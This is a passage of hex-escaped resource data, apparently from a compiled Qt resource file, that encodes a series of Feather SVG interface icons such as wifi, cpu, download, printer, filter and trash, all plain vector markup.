\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x77\x69\x66\x69\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x35\x20\x31\x32\x2e\
\x35\x35\x61\x31\x31\x20\x31\x31\x20\x30\x20\x30\x20\x31\x20\x31\
\x34\x2e\x30\x38\x20\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x2e\x34\x32\x20\x39\x61\
\x31\x36\x20\x31\x36\x20\x30\x20\x30\x20\x31\x20\x32\x31\x2e\x31\
\x36\x20\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\
\x68\x20\x64\x3d\x22\x4d\x38\x2e\x35\x33\x20\x31\x36\x2e\x31\x31\
\x61\x36\x20\x36\x20\x30\x20\x30\x20\x31\x20\x36\x2e\x39\x35\x20\
\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x30\x22\x20\
\x78\x32\x3d\x22\x31\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x32\
\x30\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x02\x9b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x70\x75\x22\x3e\
\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x34\x22\x20\x79\x3d\x22\x34\
\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\x22\x20\x68\x65\x69\
\x67\x68\x74\x3d\x22\x31\x36\x22\x20\x72\x78\x3d\x22\x32\x22\x20\
\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x72\
\x65\x63\x74\x20\x78\x3d\x22\x39\x22\x20\x79\x3d\x22\x39\x22\x20\
\x77\x69\x64\x74\x68\x3d\x22\x36\x22\x20\x68\x65\x69\x67\x68\x74\
\x3d\x22\x36\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x39\x22\x20\x79\x31\x3d\x22\x31\x22\x20\
\x78\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\x34\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x35\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\x22\x31\x35\
\x22\x20\x79\x32\x3d\x22\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\x20\x79\x31\x3d\
\x22\x32\x30\x22\x20\x78\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\
\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\x32\x30\x22\
\x20\x78\x32\x3d\x22\x31\x35\x22\x20\x79\x32\x3d\x22\x32\x33\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x32\x30\x22\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\
\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x30\x22\
\x20\x79\x31\x3d\x22\x31\x34\x22\x20\x78\x32\x3d\x22\x32\x33\x22\
\x20\x79\x32\x3d\x22\x31\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\
\x22\x39\x22\x20\x78\x32\x3d\x22\x34\x22\x20\x79\x32\x3d\x22\x39\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x34\x22\x20\x78\x32\
\x3d\x22\x34\x22\x20\x79\x32\x3d\x22\x31\x34\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x72\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x6f\x77\x6e\x6c\
\x6f\x61\x64\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\
\x31\x20\x31\x35\x76\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x2d\x32\x20\x32\x48\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x2d\x32\x2d\x32\x76\x2d\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\
\x3d\x22\x37\x20\x31\x30\x20\x31\x32\x20\x31\x35\x20\x31\x37\x20\
\x31\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\
\x22\x31\x35\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\
\x22\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\xcc\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x65\x79\x65\x2d\x6f\
\x66\x66\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x37\
\x2e\x39\x34\x20\x31\x37\x2e\x39\x34\x41\x31\x30\x2e\x30\x37\x20\
\x31\x30\x2e\x30\x37\x20\x30\x20\x30\x20\x31\x20\x31\x32\x20\x32\
\x30\x63\x2d\x37\x20\x30\x2d\x31\x31\x2d\x38\x2d\x31\x31\x2d\x38\
\x61\x31\x38\x2e\x34\x35\x20\x31\x38\x2e\x34\x35\x20\x30\x20\x30\
\x20\x31\x20\x35\x2e\x30\x36\x2d\x35\x2e\x39\x34\x4d\x39\x2e\x39\
\x20\x34\x2e\x32\x34\x41\x39\x2e\x31\x32\x20\x39\x2e\x31\x32\x20\
\x30\x20\x30\x20\x31\x20\x31\x32\x20\x34\x63\x37\x20\x30\x20\x31\
\x31\x20\x38\x20\x31\x31\x20\x38\x61\x31\x38\x2e\x35\x20\x31\x38\
\x2e\x35\x20\x30\x20\x30\x20\x31\x2d\x32\x2e\x31\x36\x20\x33\x2e\
\x31\x39\x6d\x2d\x36\x2e\x37\x32\x2d\x31\x2e\x30\x37\x61\x33\x20\
\x33\x20\x30\x20\x31\x20\x31\x2d\x34\x2e\x32\x34\x2d\x34\x2e\x32\
\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\
\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xa0\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x6c\x65\x72\x74\
\x2d\x6f\x63\x74\x61\x67\x6f\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x67\
\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x37\x2e\x38\x36\x20\
\x32\x20\x31\x36\x2e\x31\x34\x20\x32\x20\x32\x32\x20\x37\x2e\x38\
\x36\x20\x32\x32\x20\x31\x36\x2e\x31\x34\x20\x31\x36\x2e\x31\x34\
\x20\x32\x32\x20\x37\x2e\x38\x36\x20\x32\x32\x20\x32\x20\x31\x36\
\x2e\x31\x34\x20\x32\x20\x37\x2e\x38\x36\x20\x37\x2e\x38\x36\x20\
\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x38\
\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x32\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x31\x36\x22\x20\x78\
\x32\x3d\x22\x31\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x31\x36\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x72\x6f\x74\x61\x74\
\x65\x2d\x63\x63\x77\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x20\x34\x20\x31\x20\x31\
\x30\x20\x37\x20\x31\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x33\x2e\x35\
\x31\x20\x31\x35\x61\x39\x20\x39\x20\x30\x20\x31\x20\x30\x20\x32\
\x2e\x31\x33\x2d\x39\x2e\x33\x36\x4c\x31\x20\x31\x30\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x97\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x72\x69\x6e\x74\
\x65\x72\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x36\x20\x39\x20\x36\x20\x32\x20\x31\x38\
\x20\x32\x20\x31\x38\x20\x39\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x36\x20\
\x31\x38\x48\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\
\x2d\x32\x76\x2d\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\
\x32\x2d\x32\x68\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x20\x32\x20\x32\x76\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x2d\x32\x20\x32\x68\x2d\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x36\x22\x20\x79\x3d\x22\x31\
\x34\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x32\x22\x20\x68\x65\
\x69\x67\x68\x74\x3d\x22\x38\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x22\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x69\x6c\x74\x65\
\x72\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x32\x32\x20\x33\x20\x32\x20\x33\x20\x31\x30\x20\
\x31\x32\x2e\x34\x36\x20\x31\x30\x20\x31\x39\x20\x31\x34\x20\x32\
\x31\x20\x31\x34\x20\x31\x32\x2e\x34\x36\x20\x32\x32\x20\x33\x22\
\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x5f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x6c\x75\x73\x2d\
\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\
\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\
\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\
\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\
\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x32\x22\
\x20\x78\x32\x3d\x22\x31\x36\x22\x20\x79\x32\x3d\x22\x31\x32\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x64\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x72\x61\x73\x68\
\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x33\x20\x36\x20\x35\x20\x36\x20\x32\x31\x20\x36\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x31\x39\x20\x36\x76\x31\x34\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x20\x32\x48\x37\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\x56\x36\x6d\x33\
\x20\x30\x56\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\
\x2d\x32\x68\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\
\x20\x32\x76\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x76\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x65\x6c\x65\x74\
\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\x20\
\x34\x48\x38\x6c\x2d\x37\x20\x38\x20\x37\x20\x38\x68\x31\x33\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\x32\x56\x36\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x32\x2d\x32\x7a\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x38\x22\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\
\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\
\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x31\x38\x22\x20\
\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
